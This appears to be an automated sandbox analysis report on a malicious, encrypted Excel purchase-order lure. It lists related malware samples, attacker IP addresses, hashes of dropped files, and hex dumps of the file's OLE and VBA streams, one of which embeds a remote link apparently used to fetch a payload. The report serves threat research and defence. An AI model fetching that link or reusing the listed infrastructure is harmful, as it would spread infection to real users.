                                ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                MDRHZBOL2477518 CO.xlsGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                EKSENBILISIMTRhttps://touchmplexs.shopGet hashmaliciousCaptcha PhishBrowse
                                • 147.79.120.170
                                List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                242508-02.docx.docGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                242508-02.docx.docGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                MICROSOFT-CORP-MSN-AS-BLOCKUSPricing Analysis - Ecomm and Amazon vs List.xlsxGet hashmaliciousUnknownBrowse
                                • 13.107.246.41
                                phish_alert_sp2_2.0.0.0-1.emlGet hashmaliciousUnknownBrowse
                                • 52.109.0.91
                                FW_ FW_ DirectDeposit# 952759 _ Payment_ HSAAZDIXHI [ID_0024087].emlGet hashmaliciousInvisible JS, Tycoon2FABrowse
                                • 20.189.173.18
                                https://www.google.at/url?q=https%3A%2F%2Fsites.google.com%2Fview%2Fgfyhgfdgd%2Fhome&sa=D&sntz=1&usg=AOvVaw2V-B7GR4_wvs2FgIKvg5nYGet hashmaliciousHTMLPhisherBrowse
                                • 51.11.192.50
                                https://notedex.app/CardShare/2d6cdd7b-2589-4e00-9c06-b91087357b2dGet hashmaliciousUnknownBrowse
                                • 52.176.165.69
                                tHmLxo3S58.exeGet hashmaliciousLummaC Stealer, Stealc, VidarBrowse
                                • 204.79.197.203
                                https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j#?8407378349Family=a2lyc3RpZS5yZWVzQHF1aWx0ZXJjaGV2aW90LmNvbQ==Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                • 20.190.190.196
                                20250326_105213_E06iobGVLsebU2XlmUYXRv33mfADWIwk.emlGet hashmaliciousUnknownBrowse
                                • 52.123.128.14
                                AS-COLOCROSSINGUSrRYQiGZ4K3.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC Stealer, Stealc, VidarBrowse
                                • 107.174.192.179
                                a69aiSX97n.exeGet hashmaliciousAmadey, DarkVision Rat, LummaC StealerBrowse
                                • 104.168.28.10
                                ATitERlY7I.exeGet hashmaliciousScreenConnect Tool, Amadey, DarkVision Rat, LummaC StealerBrowse
                                • 104.168.28.10
                                goodgirlwithbestbattingwithgoodthings.htaGet hashmaliciousRemcosBrowse
                                • 192.3.232.40
                                givemebestthingsforgivemebest.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                • 172.245.123.32
                                globalshippingservice.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                • 107.174.231.211
                                bestkissingdayswithgreatnicebeautygirlsareound.htaGet hashmaliciousCobalt Strike, AgentTeslaBrowse
                                • 192.3.216.141
                                file.exeGet hashmaliciousDarkVision RatBrowse
                                • 104.168.28.10
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                6271f898ce5be7dd52b0fc260d0662b3List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                Bank Information.xlsGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                https://eu-central-1.protection.sophos.com/?d=klclick3.com&u=aHR0cHM6Ly9jdHJrLmtsY2xpY2szLmNvbS9sLzAxSlE2TldIMFdaVkdNV0tBODFNQkZGN1JUXzI=&p=m&i=NjcwOGRlNTQxNWVkNDAyNmUyZjA5MzFh&t=VUNaZ1Yza2szQkUxQ2V5U3gwNDYvRXh1ZWpOb1orVWYwMkVMRzFlQmtmMD0=&h=696c0b13c9bb46b2b210e89a34578cd9&s=AVNPUEhUT0NFTkNSWVBUSVbYlGfZU66j8K_UDSuTsyS5h7hisQMzbX-xxgbWnDCCvgGet hashmaliciousHTMLPhisherBrowse
                                • 147.79.86.93
                                ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                Bank Information.xlsGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                MDRHZBOL2477518 CO.xlsGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                Merged documents.docx.docGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 147.79.86.93
                                a0e9f5d64349fb13191bc781f81f42e1Pricing Analysis - Ecomm and Amazon vs List.xlsxGet hashmaliciousUnknownBrowse
                                • 13.107.246.41
                                Loader.exeGet hashmaliciousLummaCBrowse
                                • 13.107.246.41
                                4UuBoHs64W.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.41
                                tHmLxo3S58.exeGet hashmaliciousLummaC Stealer, Stealc, VidarBrowse
                                • 13.107.246.41
                                4MlZyXN7Co.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.41
                                3DTcqOJmxa.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.41
                                hfRqL1uE9g.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.41
                                YpN8Ya9e0I.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.41
                                d#U043e.xlsmGet hashmaliciousUnknownBrowse
                                • 13.107.246.41
                                No context
                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):118
                                Entropy (8bit):3.5700810731231707
                                Encrypted:false
                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                MD5:573220372DA4ED487441611079B623CD
                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):784
                                Entropy (8bit):2.7137690747287806
                                Encrypted:false
                                SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                                MD5:09F73B3902CD3D88E04312787956B654
                                SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                                SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                                SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):512
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3::
                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):1.7769794087092887
                                Encrypted:false
                                SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                MD5:37BD8218D560948827D3B948CAFA579C
                                SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                Malicious:true
                                Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Mar 26 15:55:25 2025, Security: 1
                                Entropy (8bit):7.975743789189764
                                TrID:
                                • Microsoft Excel sheet (30009/1) 47.99%
                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                File name:PURCHASE ORDER 517-2025.xla.xlsx
                                File size:1'064'448 bytes
                                MD5:4d57f2dfe4050bf6605af3c1be23d9e2
                                SHA1:db1b4d7cd15f21378a456e7fdf49648b39ba731a
                                SHA256:2edf703005001488ac02fe1c1b08784c938d944a5e8dd4345b00ea3d6e7b68f6
                                SHA512:cb144e71faf5ef0582c4dcddf89cd0e4f264b3a6953309fd3d0e3294bbf3d8b45970c0a2362216f4acbf520e1a4647eb4b30bd4d7d94eb567c541f55be37e1cd
                                SSDEEP:24576:zJIwgAIb3nOXYXKFlevIBoyK6wueeBbJYvH:zzgh7O7FlegBoy1deCqvH
                                TLSH:C03523DABE947E53DB0B00B61B86C4AE540B7F9D264CE10B7634734A1537A6E80F583E
                                File Content Preview:........................>...................................E...........................................................................h......................................................................................................................
                                Icon Hash:35e58a8c0c8a85b9
                                Document Type:OLE
                                Number of OLE Files:1
                                Has Summary Info:
                                Application Name:Microsoft Excel
                                Encrypted Document:True
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:True
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:False
                                Flash Objects Count:0
                                Contains VBA Macros:True
                                Code Page:1252
                                Author:
                                Last Saved By:
                                Create Time:2006-09-16 00:00:00
                                Last Saved Time:2025-03-26 15:55:25
                                Creating Application:Microsoft Excel
                                Security:1
                                Document Code Page:1252
                                Thumbnail Scaling Desired:False
                                Contains Dirty Links:False
                                Shared Document:False
                                Changed Hyperlinks:False
                                Application Version:786432
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                VBA File Name:Sheet1.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < ^ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c 5e c3 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet1"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                VBA File Name:Sheet2.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c 0b 02 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet2"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                VBA File Name:Sheet3.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < s . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c c2 73 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet3"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                VBA File Name:ThisWorkbook.cls
                                Stream Size:985
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < _ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c 5f ee 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "ThisWorkbook"
                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:\x1CompObj
                                CLSID:
                                File Type:data
                                Stream Size:114
                                Entropy:4.25248375192737
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:\x5DocumentSummaryInformation
                                CLSID:
                                File Type:data
                                Stream Size:244
                                Entropy:2.889430592781307
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                General
                                Stream Path:\x5SummaryInformation
                                CLSID:
                                File Type:data
                                Stream Size:200
                                Entropy:3.2920681057018664
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . | g . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                General
                                Stream Path:MBD001A3105/\x1CompObj
                                CLSID:
                                File Type:data
                                Stream Size:99
                                Entropy:3.631242196770981
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:MBD001A3105/Package
                                CLSID:
                                File Type:Microsoft Excel 2007+
                                Stream Size:943862
                                Entropy:7.993297968973981
                                Base64 Encoded:True
                                Data ASCII:P K . . . . . . . . . . ! . . o ^ . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 16 6f 5e 0e 16 02 00 00 ce 09 00 00 13 00 cb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                General
                                Stream Path:MBD001A3106/\x1Ole
                                CLSID:
                                File Type:data
                                Stream Size:680
                                Entropy:5.337550112710684
                                Base64 Encoded:False
                                Data ASCII:. . . . t . ~ \\ I * . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . a . g . r . . . m . y . / . v . J . c . D . 8 . F . ? . & . s . i . l . k . = . e . n . t . h . u . s . i . a . s . t . i . c . . . . m = . V & 2 . G " a . F . . z B v . + \\ 7 d . c . . U . k . O { u . , 8 . K | . s f . . ' . Q \\ . R < . e . J 1 r l m . d h t ! . . c . < . % ) F . w . ` 7 . . . . . . . . . . . . . . . . ^ . . . 6 . e . L . L . y . k . l . c . W . g . Q . b . V . I . v . 9 . O . Q . F . I .
                                Data Raw:01 00 00 02 fb 74 b8 18 7e 5c 49 2a 00 00 00 00 00 00 00 00 00 00 00 00 ea 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e6 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 61 00 67 00 72 00 2e 00 6d 00 79 00 2f 00 76 00 4a 00 63 00 44 00 38 00 46 00 3f 00 26 00 73 00 69 00 6c 00 6b 00 3d 00 65 00 6e 00 74 00 68 00 75 00 73 00 69 00 61 00 73 00 74 00 69 00 63 00
                                General
                                Stream Path:Workbook
                                CLSID:
                                File Type:Applesoft BASIC program data, first line number 16
                                Stream Size:97639
                                Entropy:7.992089973780545
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . - j . @ . M . . , K 7 h k o . ] . F ` = . F X . . . . . . . . . . ^ . . . \\ . p . c Q W . . . . E u . . W K g _ T \\ . . . u J U . ! c D } . u d E = D O @ B W ? . . Q I . g } $ . k 9 e . B . . . = I a . . . 9 D . . . = . . . . m 9 . . . P g . X L . i . . . . . . . . H . . . . . . . . d . . . . . . J " = . . . q ? . I ` . ? < / . . @ . . . . . . . . } " . . . . . . . . 9 . . . . 1 ` . . . . 1 . . . | T V \\ L . . { f F . C n } P . 9 1 . . . . Q . . F $ !
                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 2d 84 6a c2 a0 40 b5 d5 bc 4d ca f2 95 01 1d bb f4 b1 ea 2c 9e f4 bb 4b f7 37 b1 a9 68 6b 6f ec f9 1d a2 c4 5d b4 05 46 60 cd 3d 89 ba 00 46 58 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 5e c3 e2 00 00 00 5c 00 70 00 63 ab 51 57 b7 09 a8 04 d1 06 03 ae 45 75 e0 ca 00 99 cd 8b c1 57 ae ed f5 fc
                                General
                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                CLSID:
                                File Type:ASCII text, with CRLF line terminators
                                Stream Size:525
                                Entropy:5.22950296860598
                                Base64 Encoded:True
                                Data ASCII:I D = " { E 1 E B 2 6 F C - B 2 9 9 - 4 2 A 8 - A 1 B E - 7 E 1 6 2 1 5 1 C 0 5 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 E 3 C D D C 2 6 7 4 2 4 0 4 6 4
                                Data Raw:49 44 3d 22 7b 45 31 45 42 32 36 46 43 2d 42 32 39 39 2d 34 32 41 38 2d 41 31 42 45 2d 37 45 31 36 32 31 35 31 43 30 35 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                General
                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                CLSID:
                                File Type:data
                                Stream Size:104
                                Entropy:3.0488640812019017
                                Base64 Encoded:False
                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
